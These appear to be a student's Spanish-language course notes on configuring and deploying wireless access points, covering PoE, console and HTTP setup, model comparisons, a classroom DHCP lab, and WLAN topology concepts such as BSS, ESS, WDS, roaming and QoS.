5.- Alimentacion. Toma de corriente cerca. La tecnica PoE para alimentacion (Power on Ethernet, alimentar a traves del cable Ethernet). Los 4 hilos del RJ45 sobrantes pueden ser utilizados para alimentar el AP. Hay Swtch permiten alimentar al AP aunque lo mas habitual es usar un inyector PoE. Por un lado tiene la entrada Ehternet por otro lado la salida Ethernet por otro lado la salida AP. Tienen que se compatibles con la marca del AP. Inyectara el voltaje que necesita.

AP Cisco conector de Consola RS232 conector Puerto serie antiguo usado por los modem, ratones antiguos. A trave de Hiperterminal en sistemas NO UNiX. Puede utilizarse una tarjeta PCMCIA RS232. Este puerto serie no utiliza IP.
Para configuracion por browser utilizo HTTP o Telnet. Los dos aparatos deben estar en la misma red IP. Escaneando la red (soft), conoceremos las ip's de la red. RJ11 = telefonia (modem), RJ45 Redes.

Para conectar un Broad Band a un AP necesitamos un modem. En los routers adsl viene todo.

Profesional --> Router (con adsl), a un Switch y del switch al AP. Sobre todo DEL MISMO FABRICANTE.


LINKSYS WRT54GL --> sistema operativo LINUX.

Comparativa de modelos AP:

D-Link DWL-2100AP b/g potencia de transmision 17+2dbi = 19 dbm. Operation Modes, Access Point. Bridge, Repetidor, WEP, WPA, WPA2. Filtrado de MAC. Desactivar SSID. Potencia de recepcion - 54 mbps -66 dbm, 12 mbps -85 dbm. La sensibilidad mayor cuanto velocidad es mas lenta. Potencia Adaptador 5 voltios 2.0 Amperios. Servicios --> QOS, Equilibrio de carga (Load balance). Conf HTTP, Telnet con java instalado. Temp 0 a 40 grados.
-2000AP

Linksys WRT54GL IP DEFAULT 192.168.1.1, STANDARD IEEE802.11 b/g, WEP WPA (TKIP, AES, SHARE KEY 8-63 CARACTERS, RENOVAR CLAVE CADA HORA), WPA2 (ENTERPRISE OR RADIO), filtrado de MAC. 12 VOLTIOS 0.5 amperios, USER NAME BLANK PASSWD admin. soporta WINS firewall protection, QOS para la parte del router, POTENCIA DE SALIDA 18 dbm. EIRP 20 dbm. Switch ports (cruzan, no necesitare cross-over)

Cisco AP-AP1131AG a/b/g 2'4 GHz, 5'0 GHz. Sensibilidad desde -93 dbm hasta 70 dbm. Transmision desde los 17 db hasta los 20. Antena de 3 dbi (b/g) y la de 5'0 a 4.5 dbi (a), (tiene dos chips de radio uno para 2.4 y otro para 5'0 GHz). PoE. Memory 32 MB.

Standards soportados
Potencia emision
Potencia recepcion, sensibilidad
Modo trabajo (repetidor)
Segurida
PoE
Qos
redundancia
equilibrio de carga

AP:

- Alimentacion --> transformador o PoE (inyector). Con el AP APAGADO. Recomendacion del fabricante (Cisco).
- Reset. Eliminar todas las configuraciones que pueda tener el AP. Deja el aparato en la configuracion original.
- Conectar el AP a una consola o un PC para configurarlo. --> HTTP (browser
--> Telnet. Protocolo para gestionar de forma remota un ordenador. A traves de la Red.
--> CONSOLA = Terminal.

En los dos primeros casos ambos deben estar en la misma Red y PC y AP en la misma Red IP.
Para estar en la misma IP:
a) Que el AP tenga una IP por defecto. Cambio la IP de mi ordenador para que este en el mismo rando de IP's que el AP. Verificar que ningun PC de mi red tenga la misma IP. A partir de aqui utilizo el Browser. Cable de red conectado a un SWITCH.
b) Si el AP no tiene una IP pero en el momento de conectarse a la red pide que alguien le de una IP por DHCP. Si no tiene una IP valida no podre entrar ni por HTTP ni por TELNET. Normalmente en los routers hay un DHCP activado.

--> Consola: Utilizaremos un cable por un extremo RJ45 y por el otro puerto serie (DB9), es el cable de consola del equipo (AP). O tarjeta PCMCIA con un puerto serie (portatil). Una vez conectado el cable de consola, utilizo un progama DIAL-UP en los sistema NO UNiX se utiliza el Hiperterminal. Saldra texto hasta que llegar a un prompt. Necesitare saber la contraseña de mantenimiento.

Configuracion Basica:

1. Habilitar el chip de radio en el que quiero trabajar a/b/g. No tiene sentido mezclar standards. O todos b o todos g, en principio.
2. SSID (Identificador de servicio = nombre del AP).
3. IP Mascara, Gateway, anotar la MAC del equipo y asegurarnos que es la MAC de la Wireless.
4. Canal
5. Modo de trabajo. Puede ser Root/Raiz (cuando trabaja solo) o Bridge/Repetidor (puente).
6. Seguridad --> Abierta (para hacer las pruebas).

CISCO a traves de consola:
ap> enable
Password: CISCO
ap# ? (para ayuda) --> en el curso de cisco esta el estudio del sistema operativo.
ap# IP asignada 192.168.1.108
ap# running-config
ap#

Consola:

enable
configure terminal
interface FastEthernet0/0
ip address 192.168.5.1 255.255.255.0
no shutdown
exit
exit

Ejercicio:
configurar standard usaremos el g, ssid, activar balizas, Modo de trabajo access point, elegir un canal, potencia maxima. Guardar cambios

Practica wireless:

Conectar un AP a un SWITCH y a este dos pc's conectados de manera wired y dos pc's con sendas tarjetas wireless.

Lo primero sera encender uno de los pc's que llamaremos PC_01 en cuyo sistema, GNU-Linux, instalaremos un servidor DHCP, le asignamos una IP fija, la 192.168.1.1. Sera el encargado de otogar la IP al AP (ACCESS POINT). Es un AP profesional que no trae IP por defecto y conexion por HTTP, TELNET y CONSOLA (con un cable que en un extremo tiene un puerto serie DB9 y en el otro extremo RJ45) . El ambito del DHCP sera: 192.168.1.100 hasta 192.168.1.105.

Conectar el AP al puerto serie del PC_01 a traves del cable de consola incluido en el aparato.
Conectar el cable RJ45 desde el AP a uno de los puertos EHTERNET del SWITCH.
Conectar el cable de alimentacion del AP al adaptador y desde el adaptador a la toma de corriente y resetear el Access Point para eliminar toda configuracion anterior si la hubiera.

Desde el PC_01 conectar, a traves del puerto serie, con el AP abriendo una Terminal o Consola.
Introducir el nombre de usuario y el password default (ver manual del aparato).
Despues de un instante veremos la IP del AP = 192.168.1.100

Entramos por HTTP con la IP 192.16.1.100 y configuramos las opciones Basicas.
a. Activar modo Access Point
b. SSID = W_AULA04
c. Activar Standard g (nuestro AP es dual a/b/g y podra utilizar las frecuencias 2'4 GHz (b/g) o 5'0 GHz (a)).
d. Seguridad desactivada (para las pruebas).
Lo demas opciones por defecto, de momento, incluido el canal (eligira automaticamente el menos congestionado).

En los PC's PC_02 y PC_03 utilizaremos la red cableada y en los PC_04 y PC_05 la inalambrica.
Ahora solo nos quedara instalar los controladores o drivers de las tarjetas wireless de los clientes y configurar la conexion, asegurandonos de que todos pertenezcan a la misma Red o sea, al mismo rango IP. Realizamos las comprobaciones de lugar y nos conectamos a la SSID W_AULA04.
Comprobamos la velocidad de la Red. La puerta de enlace predeterminada sera la IP = 192.168.1.1

DHCP: (acrónimo de Dynamic Host Configuration Protocol que se traduce Protocolo de configuración dinámica de servidores) es un protocolo que permite a dispositivos individuales en una red de direcciones IP obtener su propia información de configuración de red (dirección IP; máscara de sub-red, puerta de enlace, etc.) a partir de un servidor DHCP.


REPASO:

Topologia:

WLAN --> Indoor
--> Outdoor - conectar dos edificios por medio de Bridge.

Pueden dividirse --> Redes Ad-hoc
--> Infraestructura

Las redes Indoor Infraestructura - BSS --> AP crea una zona de cobertura, a todos los nodos que esten en esta zona de cobertura se les llama BSS. Es la red mas basica en infraestructura. Celula. Basic Set Service (BSS). Celula es el area de cobertura. Como tenemos un solo BSS solo tenemos una area de cobertura.
La practica de ayer eran BSS separadas (4). El otro caso es ESS (Extended Set Service). Dos AP conectados al mismo switch y al mismo servidor DHCP. Si dos BSS estan conectadas a una misma red consideramos que las dos celulas estan en una ESS. Separados para dar mas cobertura.

La finalidad es que que la red inalambrica este conectada a la red alambrica = Backbone Ethernet.

Para una cobertura optima la zona de superposicion debe ser entre un 10-15 % del radio del AP.

En vez de contratar 20 megas como maximo contratar 5 megas como minimo.

El otro caso es necesario conectar otra zona a la red inalambrica, en ese caso colocamos un AP que hara de repetidor y el principal como RAIZ. Un ap que trabaja como un router root (raiz). El repetidor coge la señal del AP RAIZ. El Root le trata al repetidor como otro cliente. Algunos AP dejan de dar cobertura a los clientes cuando hacen de repetidor.

WDS:
Dividen su tiempo entre los clientes y AP. Tendran todos los clientes conectados incluido el REPETIDOR.

En situaciones mas complejas puede ser posible colocar dos AP's cerca para aumentar la fiabilidad y velociad lo que se llama REDUNDANCIA.
Si tengo muchos pc's que se conectan y el AP tiene EQUILIBRIO DE CARGA aceptara una cantidad limitada de conexiones a partir de las cuales el cliente debera conectarse al otro AP. Los canales tienen que ser diferentes y no solapados. Por ejemplo, 1 y 6.

Otro caso. Uno de los AP estara en MODDO DE ESPERA, si falla uno entra el otro. Estaran en el mismo canal. El segundo se pone en marcha cuando deja de recibir señal del primero. Para lo cual establecen comunicacion periodica.

ITINERANCIA - La posibilidad de pasar de una celula a otra sin perder la conexion. Dos celulas conectadas entre si. Si las dos celulas tienen la misma Red IP no hay problema porque sigo teniendo la misma Red IP. Pero si cada celula esta en una red diferente al salir de la Red A y pasar a la Red B tendre una IP no valida para la Red B. Solucion = que los AP que este utilizando soporte IP mobile, lo que quier decir que si tengo dos AP con Ip mobile el mismo AP dara una ip valida. En este caso la IP de los clientes debe ser dinamica.

QoS es otra caracteristica de otorgar prioridades en la transmision inalambrica.
Por ejemplo, Una camara ip, dos PC's. La camara tiene una ip fija, la configuracion es similar a configurar un AP. La camaras IP se conectan al AP y envian paquetes IP, de ahi su nombre. Se configura para enviar los paquetes a un ordenador o a traves de internet. Si mi AP tiene esta tecnologia (QoS) la prioridad de ancho de banda sera para la camara IP. Muchas camaras tienen el QoS. El AP le dara mas tiempo a la Camara. Los clientes y el AP tienen que soportar QoS. El QoS reserva el 20 % del ancho de banda en el ORDENADOR no en el AP. En los sistemas NO UNiX el QoS esta habilitado por defecto.

ASOCIACION. Hay un primer paso de deteccion o escaneo --> escaneo activo el pc cuando se enciende le pide a un ap en concreto informacion para poder conectarse a el
--> escaneo pasivo el pc esta en escucha para ver si pasa alguien.
Enciendo mi pc y hay redes a las que puedo conectarme, mi cliente recibe la informacion de los canales. Para saber la informacion de numero MAC, CANAL, ETC. si algun ap no tiene activada esa opcion no nos dara esa informacion, si estan en pasivo no recibira de los clientes que no envian de los que no estan en escaneo activo. Veo las redes que se dan a conocer. El airodump hace escaneo activo se utiliza para detectar todos los AP.

Una vez identificado a quien quiero conectarme viene la

AUTENTICACION. Le digo al AP que quiero conectar y evalua si me puedo conectar o no. Si tengo permiso para conectar llega la

ASOCIACION. Luego asignar una

IP

ASOCIACION
DETECCION
AUTENTICACION
ASOCIACION
IP

PoE conectarme a la corriente a traves del mismo cable de Red. Tiene que soportarlo el AP y tener cable de red y un inyector PoE. o Transformador
El AP lleva un boton de Reset par volver a empezar y obtner los valores por defecto = DEFAULT.
Configuracion del AP --> HTTP (necesito una ip conocida), TELNET (necesito una ip conocida, usando un programa cliente telnet), CONSOLA (conectando un cable especial al AP y a traves de un programa configuro el AP con comandos).

IMPORTANTE: La puerta de enlace es para conectar un ROUTER. Si tenemos varios pc's conectados a la misma red, no necesito puerta de enlace. Si en la red hay un router si necesito Puerta de Enlace. Los que no necesitan salir no necesitan PUERTA DE ENLACE. En todo caso la IP que se pone como puerta de enlace es al del ROUTER.

DISEÑO: Un diseño previo, y tener muy claro como va a ir mi red.

RECOPILACION informacion sobre la red que quiero montar. Etiquetar cada ordenador es lo primero. En los cables y en las rosetas pondremos un numero. Tener claro en un ordenador que tengo, tarjetas, etc. Documentar, documentar. REQUISITOS NECESIDADES CONDICIONANTES.

DISEÑO PREVIO. Depuracion. Replantearme de acuerdo a los cambios o limitaciones en los equipos.

IMPLEMENTACION. Monto la red. Depurar por cuestiones esteticas o de otra indole.

PRUEBAS. 1-7 (un dia sin usuarios y 7 dias de pruebas con al red en marcha), de velocidad, de cobertura, etc.

ENTREGA y firma.

La interferencia es un campo magnetico que cambia.

En el repetidor el cable queda anulado